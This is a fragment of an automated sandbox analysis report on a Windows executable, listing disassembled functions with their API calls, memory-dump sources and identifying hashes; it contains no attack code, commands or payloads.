                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1324828854-0
                                                                                      • Opcode ID: de5afda4caaca981d0fc51550d453be4d37a525d4a6bfdda3aaa85da87dc339f
                                                                                      • Instruction ID: 87f799220b33e1268d50cd7cb76d57d4f8ffcccb486c60c6ff9d3fb40e050203
                                                                                      • Opcode Fuzzy Hash: de5afda4caaca981d0fc51550d453be4d37a525d4a6bfdda3aaa85da87dc339f
                                                                                      • Instruction Fuzzy Hash: 7651C3B1A00649AFDB11CFA8D885BEEBBF9FF09310F14411AF955E7292D7309A41CB60
                                                                                      Function 00C32D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00C32D4B
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00C32D53
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00C32DE1
                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00C32E0C
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00C32E61
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                      • String ID: csm
                                                                                      • API String ID: 1170836740-1018135373
                                                                                      • Opcode ID: 0073106204bd138aa915a011456cb3cd79456d5cf3284cbb5c61a25f54efde63
                                                                                      • Instruction ID: f904f1f1777378d395fc78f1ea3065b82b53f8907ae2d776f204633d5ad1dcd6
                                                                                      • Opcode Fuzzy Hash: 0073106204bd138aa915a011456cb3cd79456d5cf3284cbb5c61a25f54efde63
                                                                                      • Instruction Fuzzy Hash: 3241D534E20209EBCF10DF68CC85A9EBBB5BF44325F148156E925AB392D731EA05CBD1
                                                                                      Function 00C910B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C9304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C9307A
                                                                                        • Part of subcall function 00C9304E: _wcslen.LIBCMT ref: 00C9309B
                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C91112
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C91121
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C911C9
                                                                                      • closesocket.WSOCK32(00000000), ref: 00C911F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                      • String ID:
                                                                                      • API String ID: 2675159561-0
                                                                                      • Opcode ID: 357c2c931211a55ffdde612fc36e237729619dfdb1d9daa842df05f72029b3ba
                                                                                      • Instruction ID: ce6fb58a3d4dde851fa4a73c497ec31783931eef653d6ac91d98dbcb9da2d875
                                                                                      • Opcode Fuzzy Hash: 357c2c931211a55ffdde612fc36e237729619dfdb1d9daa842df05f72029b3ba
                                                                                      • Instruction Fuzzy Hash: 3741E731600205AFDB109F54C889BADB7E9FF46368F188059FD259B291C774EE81CBE1
                                                                                      Function 00C7CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C7DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C7CF22,?), ref: 00C7DDFD
                                                                                        • Part of subcall function 00C7DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C7CF22,?), ref: 00C7DE16
                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00C7CF45
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00C7CF7F
                                                                                      • _wcslen.LIBCMT ref: 00C7D005
                                                                                      • _wcslen.LIBCMT ref: 00C7D01B
                                                                                      • SHFileOperationW.SHELL32(?), ref: 00C7D061
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 3164238972-1173974218
                                                                                      • Opcode ID: a95836862f6c154e9a7ce7390624d4bfaa4f75075428bb48e22f89db649e53c9
                                                                                      • Instruction ID: ac7324059765c478c2d6bd2e929d7b73c0f0483c8f91b32f9264cb5b95657d9a
                                                                                      • Opcode Fuzzy Hash: a95836862f6c154e9a7ce7390624d4bfaa4f75075428bb48e22f89db649e53c9
                                                                                      • Instruction Fuzzy Hash: 294154719052195FDF12EFA4C9C1BDEB7BCAF19380F0040EAE509EB142EA34A788DB50
                                                                                      Function 00CA2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CA2E1C
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CA2E4F
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CA2E84
                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CA2EB6
                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CA2EE0
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CA2EF1
                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CA2F0B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 2178440468-0
                                                                                      • Opcode ID: 22d297d87d376fba98b81619aee8c252aca06bc0b584464b4fbc64b17598e45f
                                                                                      • Instruction ID: d9b30bedb621b1d4647a81da5e4fef2459cadffdda321c4c26ca688651948ae6
                                                                                      • Opcode Fuzzy Hash: 22d297d87d376fba98b81619aee8c252aca06bc0b584464b4fbc64b17598e45f
                                                                                      • Instruction Fuzzy Hash: 2C31E2306041A2AFDB21CF5CDCC4FA937E1EB4A729F190164F9118F2A2CB71AD90DB41
                                                                                      Function 00C77726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C77769
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C7778F
                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00C77792
                                                                                      • SysAllocString.OLEAUT32(?), ref: 00C777B0
                                                                                      • SysFreeString.OLEAUT32(?), ref: 00C777B9
                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00C777DE
                                                                                      • SysAllocString.OLEAUT32(?), ref: 00C777EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                      • String ID:
                                                                                      • API String ID: 3761583154-0
                                                                                      • Opcode ID: e655c08fbf5483112eab978998dab207190e477f457691beb86c9879d165c5ca
                                                                                      • Instruction ID: 2f8b681f4cac58f69f02ff3b5b7b6c046a025bd39096de34bb8e1ca78d44147d
                                                                                      • Opcode Fuzzy Hash: e655c08fbf5483112eab978998dab207190e477f457691beb86c9879d165c5ca
                                                                                      • Instruction Fuzzy Hash: E021AE7660421DAFDB15DFA8DC88EBF77ACEB093647008125BA18DB190D670DD42C764
                                                                                      Function 00C777FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C77842
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C77868
                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00C7786B
                                                                                      • SysAllocString.OLEAUT32 ref: 00C7788C
                                                                                      • SysFreeString.OLEAUT32 ref: 00C77895
                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00C778AF
                                                                                      • SysAllocString.OLEAUT32(?), ref: 00C778BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                      • String ID:
                                                                                      • API String ID: 3761583154-0
                                                                                      • Opcode ID: 69cc563ba255e5955f0771e90a90ca8d6a3b8b2594b2db1c9b23d7bed450b1a8
                                                                                      • Instruction ID: 31c8666d4d915d2022d49ae9bb2f21b20e8fcd57da2fa3d9e49674c98e5c2e44
                                                                                      • Opcode Fuzzy Hash: 69cc563ba255e5955f0771e90a90ca8d6a3b8b2594b2db1c9b23d7bed450b1a8
                                                                                      • Instruction Fuzzy Hash: 79216031608218AFDB109FB8DC8CEBA77ECEB09764710C225F919DB2A1DA74DD41CB65
                                                                                      Function 00C804D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00C804F2
                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C8052E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHandlePipe
                                                                                      • String ID: nul
                                                                                      • API String ID: 1424370930-2873401336
                                                                                      • Opcode ID: 5ff784aae3ec35c7b596d3cf0f1a61676a931bbcdecedc13d70fd88b172e187c
                                                                                      • Instruction ID: 301d0c93f27dcfb515e0ac3741a19c7fdd7bedd640b5066f357c0f599820fb5b
                                                                                      • Opcode Fuzzy Hash: 5ff784aae3ec35c7b596d3cf0f1a61676a931bbcdecedc13d70fd88b172e187c
                                                                                      • Instruction Fuzzy Hash: E0217C71600305AFDB20AF29D844B9A77A4AF45728F304A29E8B1D72E0D7709A48CF28
                                                                                      Function 00C805A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00C805C6
                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C80601
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHandlePipe
                                                                                      • String ID: nul
                                                                                      • API String ID: 1424370930-2873401336
                                                                                      • Opcode ID: f940ea153e14d63a6cdbed656b53ceaca50c7a4fca16b47b449b80d11740c85b
                                                                                      • Instruction ID: 7ed307e476e188b329eae23dac8ed575e7ae2da17bc22abcffd59783f08d3018
                                                                                      • Opcode Fuzzy Hash: f940ea153e14d63a6cdbed656b53ceaca50c7a4fca16b47b449b80d11740c85b
                                                                                      • Instruction Fuzzy Hash: 2E217F755003059FDB60AF698C44B9A77E4AF96729F300B19FCB1E72E0E7709964CB28
                                                                                      Function 00CA40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C1600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C1604C
                                                                                        • Part of subcall function 00C1600E: GetStockObject.GDI32(00000011), ref: 00C16060
                                                                                        • Part of subcall function 00C1600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C1606A
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CA4112
                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CA411F
                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CA412A
                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CA4139
                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CA4145
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                      • String ID: Msctls_Progress32
                                                                                      • API String ID: 1025951953-3636473452
                                                                                      • Opcode ID: 6ad7bb5f6e882fa5db2e689409164c9dfcaad99c42a02da9d58b02e4d00c91f1
                                                                                      • Instruction ID: ba8b3d0913f3e47db2225d08c9b001e1bb1d527a8f9c040e4155fbdbefc9d641
                                                                                      • Opcode Fuzzy Hash: 6ad7bb5f6e882fa5db2e689409164c9dfcaad99c42a02da9d58b02e4d00c91f1
                                                                                      • Instruction Fuzzy Hash: 2F1186B115011A7EEF119F64CC85EEB7F5DEF09798F014111FB18A6150C672DC61DBA4
                                                                                      Function 00C4D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C4D7A3: _free.LIBCMT ref: 00C4D7CC
                                                                                      • _free.LIBCMT ref: 00C4D82D
                                                                                        • Part of subcall function 00C429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000), ref: 00C429DE
                                                                                        • Part of subcall function 00C429C8: GetLastError.KERNEL32(00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000,00000000), ref: 00C429F0
                                                                                      • _free.LIBCMT ref: 00C4D838
                                                                                      • _free.LIBCMT ref: 00C4D843
                                                                                      • _free.LIBCMT ref: 00C4D897
                                                                                      • _free.LIBCMT ref: 00C4D8A2
                                                                                      • _free.LIBCMT ref: 00C4D8AD
                                                                                      • _free.LIBCMT ref: 00C4D8B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                      • Instruction ID: c5d0dc2b14f6a00394a91677fa80e57b9e5fcfa1156ee0aaeca74245a117bbc9
                                                                                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                      • Instruction Fuzzy Hash: 59115B71940B04ABEA21BFB1CC47FCB7BDCBF10700F800825B69AE6292DA75B505A660
                                                                                      Function 00C7DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C7DA74
                                                                                      • LoadStringW.USER32(00000000), ref: 00C7DA7B
                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C7DA91
                                                                                      • LoadStringW.USER32(00000000), ref: 00C7DA98
                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C7DADC
                                                                                      Strings
                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00C7DAB9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                      • API String ID: 4072794657-3128320259
                                                                                      • Opcode ID: bb1a78ba709b76baa6a73d4b5b437dd537c3f340a985b011039ca16d84eadf34
                                                                                      • Instruction ID: ea472d6e6f16dd1ee9c5ca5e881259c88919a6e4a409d05420a88f35a30d4fda
                                                                                      • Opcode Fuzzy Hash: bb1a78ba709b76baa6a73d4b5b437dd537c3f340a985b011039ca16d84eadf34
                                                                                      • Instruction Fuzzy Hash: C1014FF25002087BE710DBA09DC9FEA726CEB09705F404496B70AE3041EA749E848B74
                                                                                      Function 00C8096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(0124E1C8,0124E1C8), ref: 00C8097B
                                                                                      • EnterCriticalSection.KERNEL32(0124E1A8,00000000), ref: 00C8098D
                                                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00C8099B
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C809A9
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C809B8
                                                                                      • InterlockedExchange.KERNEL32(0124E1C8,000001F6), ref: 00C809C8
                                                                                      • LeaveCriticalSection.KERNEL32(0124E1A8), ref: 00C809CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 3495660284-0
                                                                                      • Opcode ID: 4da88825e253aab746a1c339b4746d3066cc485b6f352a0703810abe80a005e5
                                                                                      • Instruction ID: 2dc40fe32902d32fc681ecf536aa1ebef526f413371b957bfcaf551ff57c2427
                                                                                      • Opcode Fuzzy Hash: 4da88825e253aab746a1c339b4746d3066cc485b6f352a0703810abe80a005e5
                                                                                      • Instruction Fuzzy Hash: A0F03C32542A02BBD7415FA4EECCBDABB39FF0270AF502125F202928A1CB749575CF94
                                                                                      Function 00C91C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C91DC0
                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C91DE1
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C91DF2
                                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00C91EDB
                                                                                      • inet_ntoa.WSOCK32(?), ref: 00C91E8C
                                                                                        • Part of subcall function 00C739E8: _strlen.LIBCMT ref: 00C739F2
                                                                                        • Part of subcall function 00C93224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C8EC0C), ref: 00C93240
                                                                                      • _strlen.LIBCMT ref: 00C91F35
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
